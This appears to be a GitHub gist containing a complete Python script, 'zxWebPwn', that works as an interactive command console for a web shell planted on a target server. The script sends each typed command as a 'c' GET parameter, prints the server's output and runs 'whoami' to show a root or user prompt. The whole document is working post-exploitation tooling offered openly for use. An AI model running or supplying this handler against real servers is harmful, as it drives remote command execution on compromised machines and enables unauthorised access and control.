
@zxlim
Created January 23, 2021 17:52
A very simple pseudo shell in Python to interact with web shells more effectively.
#!/usr/bin/env python3
##################################################
# Copyright (c) 2020 Zhao Xiang Lim.
# All Rights Reserved.
# Released under the MIT License.
#
# [ developer@zxlim.xyz ]
##################################################
from argparse import ArgumentParser
from urllib.parse import urlparse
import cmd
import requests
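def execute_command(url, cmd, timeout=30):
    """Send one command to the web shell and return ``(ok, text)``.

    The command travels as the ``c`` query parameter of a GET request. Query
    strings are typically written verbatim to web server access logs, and over
    plain ``http://`` both the command and its output are readable in transit.

    Args:
        url: Full URL of the web shell endpoint.
        cmd: Command line to send. Note that this parameter name shadows the
            imported ``cmd`` module inside this function.
        timeout: Seconds to wait for the connection and for the response,
            passed straight to ``requests.get``. Without it a silent or
            stalled server would block the caller forever.

    Returns:
        ``(True, body)`` when the server answers with status 200, otherwise
        ``(False, message)`` describing what went wrong.
    """
    try:
        response = requests.get(url, params={"c": cmd}, timeout=timeout)
    except requests.exceptions.ConnectionError:
        return False, f"[!] Failed to connect to target URL: {url}"
    except requests.exceptions.Timeout:
        return False, f"[!] Timed out after {timeout}s waiting for target URL: {url}"
    except requests.exceptions.RequestException as exc:
        # Malformed URLs (e.g. a missing scheme) and redirect loops land here
        # instead of escaping as a traceback.
        return False, f"[!] Request to target URL failed: {exc}"

    if response.status_code == 200:
        return True, response.text
    return False, f"[!] HTTP Error Code: {response.status_code}\n\n{response.text}"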
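def get_shell_prompt(url):
    """Build the interactive prompt from the remote ``whoami`` output.

    Args:
        url: Parsed target URL; ``geturl()`` and ``hostname`` are read from it.

    Returns:
        The prompt string, or ``False`` when the command could not be run.
    """
    cmd_success, response = execute_command(url.geturl(), "whoami")
    if not cmd_success:
        return False

    # The body is whatever the remote server chose to send. Keep only the
    # first line and drop non-printable characters so it cannot place line
    # breaks or terminal control sequences into the local prompt.
    lines = response.strip().splitlines()
    first_line = lines[0] if lines else ""
    username = "".join(ch for ch in first_line if ch.isprintable())

    suffix = "#" if username.lower() == "root" else "$"
    return f"[zxWebPwn] {username}@{url.hostname} {suffix} "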
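class zxWebPwnHandler(cmd.Cmd):
    """Line-oriented front end that forwards each input line to the web shell.

    Anything that is not one of the local commands (``help``, ``exit``,
    ``quit``, EOF, the ``zxpwn-*`` prompt refreshers) is sent to the remote
    endpoint through ``execute_command`` and the reply is printed as-is.
    """

    def __init__(self, url, prompt = "[zxWebPwn] $ "):
        """Store the parsed target URL and the prompt to display."""
        super().__init__()
        self.url = url
        self.prompt = str(prompt)

    def emptyline(self):
        """Ignore an empty input line.

        ``cmd.Cmd`` repeats the previous command by default, which here would
        send that command to the remote host a second time.
        """
        return None

    def do_help(self, line):
        """Replace the built-in help listing with a fixed message."""
        print("[zxWebPwn] You need no help. Just treat this as a 'normal' shell...")

    def default(self, line):
        """Handle every line that has no matching ``do_*`` method."""
        if line in ("zxpwn-reload-user", "zxpwn-update-user"):
            refreshed = get_shell_prompt(self.url)
            if refreshed:
                self.prompt = refreshed
            else:
                # get_shell_prompt returns False on failure; keep the current
                # prompt rather than assigning False to it.
                print(f"[!] Failed to connect to target URL: {self.url.geturl()}")
        elif line.split()[:1] == ["cd"]:
            # Match the command word itself, not every command that merely
            # begins with the letters "cd".
            # You can't really 'cd' since every command is executed in a new shell instance by the web shell.
            print("[-] NOTE: This is not a normal shell! The command 'cd' will not work as expected.")
        else:
            _, response = execute_command(self.url.geturl(), line)
            # Printed unmodified: the text comes from the remote server.
            print(response)

    def do_EOF(self, line):
        """Leave the loop on end-of-file, finishing the prompt line first."""
        print()
        return True

    def do_exit(self, line):
        """Leave the command loop."""
        return True

    def do_quit(self, line):
        """Leave the command loop."""
        return True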
def _parse_cmd_args():
    """Parse ``sys.argv`` and return the namespace holding the ``URL`` argument."""
    arg_parser = ArgumentParser(
        description="[zxWebPwn] A Web Shell Handler that improves your sanity. Sort of I guess.",
    )
    # Single required positional: the endpoint that receives commands.
    arg_parser.add_argument(
        "URL",
        type=str,
        help="Full URL of web shell instance to interact with. Make sure it takes in commands via the 'c' GET parameter.",
    )
    parsed = arg_parser.parse_args()
    return parsed
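def main():
    """Parse the target URL, probe it once, and start the command loop."""
    args = _parse_cmd_args()
    url = urlparse(args.URL)

    # Without a scheme urlparse yields no hostname, and the HTTP request
    # would fail later with a less helpful error.
    if url.scheme not in ("http", "https") or not url.hostname:
        print(f"[!] Invalid target URL (expected http:// or https://): {args.URL}")
        return

    try:
        port = url.port
    except ValueError:
        # urlparse raises when the port is not a number in the valid range.
        print(f"[!] Invalid port in target URL: {args.URL}")
        return
    if port is None:
        # No explicit port in the URL: report the scheme default instead of
        # printing "None/tcp".
        port = 443 if url.scheme == "https" else 80

    shell_prompt = get_shell_prompt(url)
    if not shell_prompt:
        print(f"[!] Failed to connect to target URL: {url.geturl()}")
        return

    print(f"[+] Connected to target at {url.hostname} ({port}/tcp)\n")
    handler = zxWebPwnHandler(url, shell_prompt)
    handler.cmdloop()


if __name__ == "__main__":
    main()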